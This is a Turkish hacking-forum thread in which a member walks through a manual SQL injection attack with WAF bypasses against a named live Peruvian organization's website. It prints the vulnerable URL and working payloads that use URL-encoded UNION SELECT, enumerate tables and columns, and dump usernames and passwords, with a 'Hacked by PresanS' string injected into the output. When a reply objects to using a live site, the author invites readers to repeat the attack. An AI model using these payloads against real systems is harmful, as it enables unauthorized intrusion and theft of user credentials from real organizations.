Manuel SQL İnjection, Waff bypass denemesi #1

PresanS

Kıdemli Üye
8 Ocak 2017
2,472
202
24
Debian

4sx426.gif

Öncelikle Herkese Selamun Aleyküm Arkadaşlar

KhJDZS.gif


Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;

http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A


KhJDZS.gif

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-


unknown.png


Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-


unknown.png

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-


unknown.png




burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-


unknown.png



KhJDZS.gif


Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.
M5MAyv.gif
 
Moderatör tarafında düzenlendi:

theSerpent

Yeni üye
17 Mar 2021
36
0
Canlı site örneği vermek pek doğru değil gibi hocam ya, bir işlem durumunda THT ip bilgilerini vereceğini söylüyor.
 

PresanS

Kıdemli Üye
8 Ocak 2017
2,472
202
24
Debian
Teşekkür ederim dostlar

Canlı site örneği vermek pek doğru değil gibi hocam ya, bir işlem durumunda THT ip bilgilerini vereceğini söylüyor.

Ben sıkıntı etmiyorum kardeşim, sen meraklanma düşündüm onları da

Anlatmakla kalmak yerine canlı site de örneğini de gösteriyorum ki öğrenecek olan isteği olan kişi gidip kendi deneyerek tecrübe edebilir.
 
Moderatör tarafında düzenlendi:

PresanS

Kıdemli Üye
8 Ocak 2017
2,472
202
24
Debian
sqlmap varken neden manuel sql injection yapmalıyız ?

Sqlmap belki bu siteyi çekmek için saatlerini alacak? Belki 2 dakika da çekecek ama başka bir site de saatlerini alacak? Belki sqlmap in tamperi waff geçemeyecek? Sqlmap ta çekemeyip manuel aldığım çok site oldu, manuel dururken Sqlmap kullanmam ben hiç bir şekilde, özellikle zaman açısından.he bak yapamadığım şey olur(URL balancer/time-based/kolon sayısı yazdırmak gibi) o zaman sqlmap başvururum.

Hayırlı kandiller android için de aynı adımları mı uygulamalıyız ?

Bilgisayar veya telefon fark etmiyor sonuçta biz URL üzerinden SQL sorgusu yapıyoruz, ben mobil kullanıyorum zaten genel de :)
 
Moderatör tarafında düzenlendi:

ZuL-RaA

Kadim Üye
9 Ara 2017
5,564
839
Semerkant
Ellerine sağlık ancak bazı kodlar görülmemiş. Onları şöyle düzeltebilirsiniz daha güzel olurlar. :)

[KOD]

ATMACA[/KOD]

KOD = CODE, sonuç:

Kod:
Atmaca
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.